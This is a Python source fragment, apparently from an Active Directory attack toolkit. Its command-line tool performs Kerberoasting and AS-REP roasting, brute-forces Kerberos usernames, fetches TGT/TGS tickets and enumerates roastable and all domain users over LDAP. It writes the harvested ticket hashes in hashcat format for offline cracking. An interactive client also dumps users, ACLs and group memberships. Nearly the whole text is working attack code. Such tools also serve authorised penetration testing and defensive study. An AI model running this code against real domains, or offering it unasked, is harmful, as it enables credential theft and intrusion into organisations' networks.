async def client(url):
try:
conn_url = MSLDAPURLDecoder(url)
conn = conn_url.get_connection()
_, err = await conn.connect()
if err is not None:
print('logon failed!')
raise err
res, err = await conn.get_serverinfo()
print(str(res))
except:
logging.exception('err!')
def run():
import argparse
parser = argparse.ArgumentParser(
description='Tool to perform verious kerberos security tests',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=kerberoast_epilog)
parser.add_argument('-v',
'--verbose',
action='count',
default=0,
help='Increase verbosity, can be stacked')
subparsers = parser.add_subparsers(help='commands')
subparsers.required = True
subparsers.dest = 'command'
ldap_group = subparsers.add_parser(
'ldap',
formatter_class=argparse.RawDescriptionHelpFormatter,
help='Enumerate potentially vulnerable users via LDAP',
epilog=MSLDAPURLDecoder.help_epilog)
ldap_group.add_argument('type',
choices=['spn', 'asrep', 'full', 'custom', 'all'],
help='type of vulnerable users to enumerate')
ldap_group.add_argument('ldap_url', help='LDAP connection URL')
ldap_group.add_argument(
'-o',
'--out-file',
help='Output file base name, if omitted will print results to STDOUT')
ldap_group.add_argument('-f',
'--filter',
help='CUSTOM mode only. LDAP search filter')
ldap_group.add_argument(
'-a',
'--attrs',
action='append',
help='FULL and CUSTOM mode only. LDAP attributes to display')
brute_group = subparsers.add_parser(
'brute', help='Enumerate users via brute-forcing kerberos service')
brute_group.add_argument('realm', help='Kerberos realm <COMPANY.corp>')
brute_group.add_argument('address', help='Address of the DC')
brute_group.add_argument(
'targets',
help='File with a list of usernames to enumerate, one user per line')
brute_group.add_argument(
'-o',
'--out-file',
help='Output file base name, if omitted will print results to STDOUT')
asreproast_group = subparsers.add_parser('asreproast',
help='Perform asrep roasting')
asreproast_group.add_argument('address', help='Address of the DC')
asreproast_group.add_argument(
'-t',
'--targets',
help='File with a list of usernames to roast, one user per line')
asreproast_group.add_argument(
'-r',
'--realm',
help=
'Kerberos realm <COMPANY.corp> This overrides realm specification got from the target file, if any'
)
asreproast_group.add_argument(
'-o',
'--out-file',
help='Output file base name, if omitted will print results to STDOUT')
asreproast_group.add_argument(
'-u',
'--user',
action='append',
help=
'Target users to roast in <realm>/<username> format or just the <username>, if -r is specified. Can be stacked.'
)
asreproast_group.add_argument('-e',
'--etype',
default=23,
const=23,
nargs='?',
choices=[23, 17, 18],
type=int,
help='Set preferred encryption type')
spnroast_group = subparsers.add_parser(
'spnroast',
help='Perform spn roasting (aka kerberoasting)',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=KerberosCredential.help_epilog)
spnroast_group.add_argument(
'kerberos_connection_string',
help=
'Either CCACHE file name or Kerberos login data in the following format: <domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>'
)
spnroast_group.add_argument(
'-t',
'--targets',
help='File with a list of usernames to roast, one user per line')
spnroast_group.add_argument(
'-u',
'--user',
action='append',
help=
'Target users to roast in <realm>/<username> format or just the <username>, if -r is specified. Can be stacked.'
)
spnroast_group.add_argument(
'-o',
'--out-file',
help='Output file base name, if omitted will print results to STDOUT')
spnroast_group.add_argument(
'-r',
'--realm',
help=
'Kerberos realm <COMPANY.corp> This overrides realm specification got from the target file, if any'
)
spnroast_group.add_argument(
'-e',
'--etype',
default=-1,
const=-1,
nargs='?',
choices=[23, 17, 18, -1],
type=int,
help='Set preferred encryption type. -1 for all')
spnroastsspi_group = subparsers.add_parser(
'spnroast-sspi', help='Perform spn roasting (aka kerberoasting)')
spnroastsspi_group.add_argument(
'-t',
'--targets',
help='File with a list of usernames to roast, one user per line')
spnroastsspi_group.add_argument(
'-u',
'--user',
action='append',
help=
'Target users to roast in <realm>/<username> format or just the <username>, if -r is specified. Can be stacked.'
)
spnroastsspi_group.add_argument(
'-o',
'--out-file',
help='Output file base name, if omitted will print results to STDOUT')
spnroastsspi_group.add_argument(
'-r',
'--realm',
help=
'Kerberos realm <COMPANY.corp> This overrides realm specification got from the target file, if any'
)
tgt_group = subparsers.add_parser(
'tgt',
help='Fetches a TGT for the given user credential',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=KerberosCredential.help_epilog)
tgt_group.add_argument(
'kerberos_connection_string',
help=
'Either CCACHE file name or Kerberos login data in the following format: <domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>'
)
tgt_group.add_argument('out_file', help='Output CCACHE file')
tgs_group = subparsers.add_parser(
'tgs',
help='Fetches a TGT for the given user credential',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=KerberosCredential.help_epilog)
tgs_group.add_argument(
'kerberos_connection_string',
help=
'Either CCACHE file name or Kerberos login data in the following format: <domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>'
)
tgs_group.add_argument(
'spn',
help=
'SPN strong of the service to get TGS for. Expected format: <domain>/<hostname>'
)
tgs_group.add_argument('out_file', help='Output CCACHE file')
auto_group = subparsers.add_parser(
'auto',
help=
'Just get the tickets already. Only works on windows under any domain-user context'
)
auto_group.add_argument('dc_ip', help='Target domain controller')
auto_group.add_argument(
'-o',
'--out-file',
help='Output file base name, if omitted will print results to STDOUT')
auto_group.add_argument('-e',
'--etype',
default=23,
const=23,
nargs='?',
choices=[23, 17, 18],
type=int,
help='Set preferred encryption type')
args = parser.parse_args()
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
kerblogger.setLevel(logging.WARNING)
msldaplogger.setLevel(logging.WARNING)
elif args.verbose == 1:
logging.basicConfig(level=logging.DEBUG)
kerblogger.setLevel(logging.INFO)
msldaplogger.setLevel(logging.INFO)
else:
logging.basicConfig(level=1)
kerblogger.setLevel(logging.DEBUG)
msldaplogger.setLevel(logging.DEBUG)
#ksoc = KerberosSocket(args.target)
if args.command == 'tgs':
cred = KerberosCredential.from_connection_string(
args.kerberos_connection_string)
ks = KerberosSocket.from_connection_string(
args.kerberos_connection_string)
domain, hostname = args.spn.split('/')
target = KerberosTarget()
target.username = hostname
target.domain = domain
comm = KerbrosComm(cred, ks)
comm.get_TGT()
comm.get_TGS(target)
comm.ccache.to_file(args.out_file)
elif args.command == 'tgt':
cred = KerberosCredential.from_connection_string(
args.kerberos_connection_string)
ks = KerberosSocket.from_connection_string(
args.kerberos_connection_string)
comm = KerbrosComm(cred, ks)
comm.get_TGT()
comm.ccache.to_file(args.out_file)
elif args.command == 'auto':
try:
from winsspi.sspi import KerberoastSSPI
except ImportError:
raise Exception('winsspi module not installed!')
domain = args.dc_ip
url = 'ldap+sspi://%s' % domain
msldap_url = MSLDAPURLDecoder(url)
connection = msldap_url.get_connection()
connection.connect()
adinfo = connection.get_ad_info()
domain = adinfo.distinguishedName.replace('DC=', '').replace(',', '.')
spn_users = []
asrep_users = []
results = []
errors = []
for user in connection.get_all_knoreq_user_objects():
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
asrep_users.append(cred)
for user in connection.get_all_service_user_objects():
cred = KerberosCredential()
cred.username = user.sAMAccountName
cred.domain = domain
spn_users.append(cred)
for cred in asrep_users:
ks = KerberosSocket(domain)
ar = APREPRoast(ks)
results += ar.run([cred], override_etype=[args.etype])
for cred in spn_users:
spn_name = '%s@%s' % (cred.username, cred.domain)
if spn_name[:6] == 'krbtgt':
continue
ksspi = KerberoastSSPI()
try:
ticket = ksspi.get_ticket_for_spn(spn_name)
except Exception as e:
errors.append((spn_name, e))
continue
results.append(TGSTicket2hashcat(ticket))
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in results:
f.write(thash + '\r\n')
else:
for thash in results:
print(thash)
for err in errors:
print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))
elif args.command == 'spnroast-sspi':
try:
from winsspi.sspi import KerberoastSSPI
except ImportError:
raise Exception('winsspi module not installed!')
if not args.targets and not args.user:
raise Exception(
'No targets loaded! Either -u or -t MUST be specified!')
targets = []
if args.targets:
with open(args.targets, 'r') as f:
for line in f:
line = line.strip()
domain = None
username = None
if line.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = line.split('/')
else:
username = line
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
spn_name = '%s@%s' % (username, domain)
targets.append(spn_name)
if args.user:
for user in args.user:
domain = None
username = None
if user.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = user.split('/')
else:
username = user
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
spn_name = '%s@%s' % (username, domain)
targets.append(spn_name)
results = []
errors = []
for spn_name in targets:
ksspi = KerberoastSSPI()
try:
ticket = ksspi.get_ticket_for_spn(spn_name)
except Exception as e:
errors.append((spn_name, e))
continue
results.append(TGSTicket2hashcat(ticket))
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in results:
f.write(thash + '\r\n')
else:
for thash in results:
print(thash)
for err in errors:
print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))
logging.info('SSPI based Kerberoast complete')
elif args.command == 'spnroast':
if not args.targets and not args.user:
raise Exception(
'No targets loaded! Either -u or -t MUST be specified!')
targets = []
if args.targets:
with open(args.targets, 'r') as f:
for line in f:
line = line.strip()
domain = None
username = None
if line.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = line.split('/')
else:
username = line
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
target = KerberosTarget()
target.username = username
target.domain = domain
targets.append(target)
if args.user:
for user in args.user:
domain = None
username = None
if user.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = user.split('/')
else:
username = user
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
target = KerberosTarget()
target.username = username
target.domain = domain
targets.append(target)
if len(targets) == 0:
raise Exception('No targets loaded!')
logging.debug('Kerberoast loaded %d targets' % len(targets))
cred = KerberosCredential.from_connection_string(
args.kerberos_connection_string)
ks = KerberosSocket.from_connection_string(
args.kerberos_connection_string)
ar = Kerberoast(cred, ks)
if args.etype:
if args.etype == -1:
etypes = [23, 17, 18]
else:
etypes = [args.etype]
else:
etypes = [23, 17, 18]
logging.debug(
'Kerberoast will suppoort the following encryption type(s): %s' %
(','.join(str(x) for x in etypes)))
hashes = ar.run(targets, override_etype=etypes)
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in hashes:
f.write(thash + '\r\n')
else:
for thash in hashes:
print(thash)
logging.info('Kerberoast complete')
elif args.command == 'asreproast':
if not args.targets and not args.user:
raise Exception(
'No targets loaded! Either -u or -t MUST be specified!')
creds = []
if args.targets:
with open(args.targets, 'r') as f:
for line in f:
line = line.strip()
domain = None
username = None
if line.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = line.split('/')
else:
username = line
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
cred = KerberosCredential()
cred.username = username
cred.domain = domain
creds.append(cred)
if args.user:
for user in args.user:
domain = None
username = None
if user.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = user.split('/')
else:
username = user
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
cred = KerberosCredential()
cred.username = username
cred.domain = domain
creds.append(cred)
logging.debug('ASREPRoast loaded %d targets' % len(creds))
logging.debug(
'ASREPRoast will suppoort the following encryption type: %s' %
(str(args.etype)))
ks = KerberosSocket(args.address)
ar = APREPRoast(ks)
hashes = ar.run(creds, override_etype=[args.etype])
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in hashes:
f.write(thash + '\r\n')
else:
for thash in hashes:
print(thash)
logging.info('ASREPRoast complete')
elif args.command == 'brute':
users = []
with open(args.targets, 'r') as f:
for line in f:
users.append(line.strip())
ksoc = KerberosSocket(args.address)
ke = KerberosUserEnum(ksoc)
results = ke.run(args.realm, users)
logging.info('Enumerated %d users!' % len(results))
if args.out_file:
with open(args.out_file, 'w') as f:
for user in results:
f.write(user + '\r\n')
else:
print('[+] Enumerated users:')
for user in results:
print(user)
logging.info('Kerberos user enumeration complete')
elif args.command == 'ldap':
ldap_url = MSLDAPURLDecoder(args.ldap_url)
connection = ldap_url.get_connection()
connection.connect()
adinfo = connection.get_ad_info()
domain = adinfo.distinguishedName.replace('DC=', '').replace(',', '.')
if args.out_file:
basefolder = ntpath.dirname(args.out_file)
basefile = ntpath.basename(args.out_file)
if args.type in ['spn', 'all']:
logging.debug('Enumerating SPN user accounts...')
cnt = 0
if args.out_file:
with open(os.path.join(basefolder,
basefile + '_spn_users.txt'),
'w',
newline='') as f:
for user in connection.get_all_service_user_objects():
cnt += 1
f.write('%s/%s\r\n' % (domain, user.sAMAccountName))
else:
print('[+] SPN users')
for user in connection.get_all_service_user_objects():
cnt += 1
print('%s/%s' % (domain, user.sAMAccountName))
logging.debug('Enumerated %d SPN user accounts' % cnt)
if args.type in ['asrep', 'all']:
logging.debug('Enumerating ASREP user accounts...')
ctr = 0
if args.out_file:
with open(os.path.join(basefolder,
basefile + '_asrep_users.txt'),
'w',
newline='') as f:
for user in connection.get_all_knoreq_user_objects():
ctr += 1
f.write('%s/%s\r\n' % (domain, user.sAMAccountName))
else:
print('[+] ASREP users')
for user in connection.get_all_knoreq_user_objects():
ctr += 1
print('%s/%s' % (domain, user.sAMAccountName))
logging.debug('Enumerated %d ASREP user accounts' % ctr)
if args.type in ['full', 'all']:
logging.debug(
'Enumerating ALL user accounts, this will take some time depending on the size of the domain'
)
ctr = 0
attrs = args.attrs if args.attrs is not None else MSADUser.TSV_ATTRS
if args.out_file:
with open(os.path.join(basefolder,
basefile + '_ldap_users.tsv'),
'w',
newline='',
encoding='utf8') as f:
writer = csv.writer(f, delimiter='\t')
writer.writerow(attrs)
for user in connection.get_all_user_objects():
ctr += 1
writer.writerow(user.get_row(attrs))
else:
logging.debug('Are you sure about this?')
print('[+] Full user dump')
print('\t'.join(attrs))
for user in connection.get_all_user_objects():
ctr += 1
print('\t'.join([str(x) for x in user.get_row(attrs)]))
logging.debug('Enumerated %d user accounts' % ctr)
if args.type in ['custom']:
if not args.filter:
raise Exception(
'Custom LDAP search requires the search filter to be specified!'
)
if not args.attrs:
raise Exception(
'Custom LDAP search requires the attributes to be specified!'
)
logging.debug(
'Perforing search on the AD with the following filter: %s' %
args.filter)
logging.debug('Search will contain the following attributes: %s' %
','.join(args.attrs))
ctr = 0
if args.out_file:
with open(os.path.join(basefolder,
basefile + '_ldap_custom.tsv'),
'w',
newline='') as f:
writer = csv.writer(f, delimiter='\t')
writer.writerow(args.attrs)
for obj in connection.pagedsearch(args.filter, args.attrs):
ctr += 1
writer.writerow([
str(obj['attributes'].get(x, 'N/A'))
for x in args.attrs
])
else:
for obj in connection.pagedsearch(args.filter, args.attrs):
ctr += 1
print('\t'.join([
str(obj['attributes'].get(x, 'N/A'))
for x in args.attrs
]))
logging.debug('Custom search yielded %d results!' % ctr)
class MSLDAPClient(aiocmd.PromptToolkitCmd):
def __init__(self, url=None):
aiocmd.PromptToolkitCmd.__init__(
self, ignore_sigint=False
) #Setting this to false, since True doesnt work on windows...
self.conn_url = None
if url is not None:
self.conn_url = MSLDAPURLDecoder(url)
self.connection = None
self.adinfo = None
self.ldapinfo = None
async def do_login(self, url=None):
"""Performs connection and login"""
try:
print('url %s' % repr(url))
if self.conn_url is None and url is None:
print('Not url was set, cant do logon')
if url is not None:
self.conn_url = MSLDAPURLDecoder(url)
print(self.conn_url.get_credential())
print(self.conn_url.get_target())
self.connection = self.conn_url.get_connection()
self.connection.connect()
except Exception as e:
traceback.print_exc()
async def do_ldapinfo(self, show=True):
"""Prints detailed LDAP connection info (DSA)"""
try:
if self.ldapinfo is None:
self.ldapinfo = self.connection.get_server_info()
if show is True:
print(self.ldapinfo)
except Exception as e:
traceback.print_exc()
async def do_adinfo(self, show=True):
"""Prints detailed Active Driectory info"""
try:
if self.adinfo is None:
self.adinfo = self.connection.get_ad_info()
if show is True:
print(self.adinfo)
except Exception as e:
traceback.print_exc()
async def do_spns(self):
"""Fetches kerberoastable user accounts"""
try:
await self.do_ldapinfo(False)
for user in self.connection.get_all_service_user_objects():
print(user.sAMAccountName)
except Exception as e:
traceback.print_exc()
async def do_asrep(self):
"""Fetches ASREP-roastable user accounts"""
try:
await self.do_ldapinfo(False)
for user in self.connection.get_all_knoreq_user_objects():
print(user.sAMAccountName)
except Exception as e:
traceback.print_exc()
async def do_dump(self):
"""Fetches ALL user and machine accounts from the domain with a LOT of attributes"""
try:
await self.do_adinfo(False)
await self.do_ldapinfo(False)
for user in self.connection.get_all_user_objects():
print(user.get_row(MSADUser.TSV_ATTRS))
#with open(args.outfile, 'w', newline='', encoding = 'utf8') as f:
# writer = csv.writer(f, delimiter = '\t')
# writer.writerow(MSADUser.TSV_ATTRS)
# for user in connection.get_all_user_objects():
# writer.writerow(user.get_row(MSADUser.TSV_ATTRS))
except Exception as e:
traceback.print_exc()
async def do_query(self, query, attributes=None):
"""Performs a raw LDAP query against the server. Secondary parameter is the requested attributes SEPARATED WITH COMMA (,)"""
try:
await self.do_ldapinfo(False)
if attributes is None:
attributes = '*'
if attributes.find(','):
attributes = attributes.split(',')
logging.debug('Query: %s' % (query))
logging.debug('Attributes: %s' % (attributes))
for entry in self.connection.pagedsearch(query, attributes):
print(entry)
except Exception as e:
traceback.print_exc()
async def do_tree(self, dn=None, level=1):
"""Prints a tree from the given DN (if not set, the top) and with a given depth (default: 1)"""
try:
await self.do_ldapinfo(False)
if level is None:
level = 1
level = int(level)
if dn is not None:
try:
int(dn)
except:
pass
else:
level = int(dn)
dn = None
if dn is None:
await self.do_ldapinfo(False)
dn = self.connection._tree
logging.debug('Tree on %s' % dn)
tree_data = self.connection.get_tree_plot(dn, level)
tr = LeftAligned()
print(tr(tree_data))
except Exception as e:
traceback.print_exc()
async def do_user(self, samaccountname):
"""Feteches a user object based on the sAMAccountName of the user"""
try:
await self.do_ldapinfo(False)
await self.do_adinfo(False)
for user in self.connection.get_user(samaccountname):
print(user)
except Exception as e:
traceback.print_exc()
async def do_acl(self, dn):
"""Feteches security info for a given DN"""
try:
await self.do_ldapinfo(False)
await self.do_adinfo(False)
for sec_info in self.connection.get_objectacl_by_dn(dn):
print(sec_info)
except Exception as e:
traceback.print_exc()
async def do_groupmembership(self, dn):
"""Feteches names all groupnames the user is a member of for a given DN"""
try:
await self.do_ldapinfo(False)
await self.do_adinfo(False)
group_sids = []
for group_sid in self.connection.get_tokengroups(dn):
group_sids.append(group_sids)
group_dn = self.connection.get_dn_for_objectsid(group_sid)
print('%s - %s' % (group_dn, group_sid))
if len(group_sids) == 0:
print('No memberships found')
except Exception as e:
traceback.print_exc()
"""